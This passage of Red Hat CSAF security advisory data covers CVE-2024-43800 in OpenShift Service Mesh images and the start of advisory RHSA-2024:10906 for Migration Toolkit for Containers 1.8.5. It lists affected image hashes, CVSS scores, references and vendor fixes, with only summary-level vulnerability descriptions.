"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
}
]
}
RHSA-2024:10906
Vulnerability from csaf_redhat - Published: 2024-12-10 01:37 - Updated: 2025-12-02 08:25Summary
Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update
Notes
Topic
The Migration Toolkit for Containers (MTC) 1.8.5 is now available.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
Details
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es) from Bugzilla:
* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)
* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* go/build/constraint: golang: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The Migration Toolkit for Containers (MTC) 1.8.5 is now available.\n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.\n\nSecurity Fix(es) from Bugzilla:\n\n* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n\n* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)\n\n* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n\n* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:10906",
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2292787",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292787"
},
{
"category": "external",
"summary": "2295310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295310"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "MIG-1458",
"url": "https://issues.redhat.com/browse/MIG-1458"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10906.json"
}
],
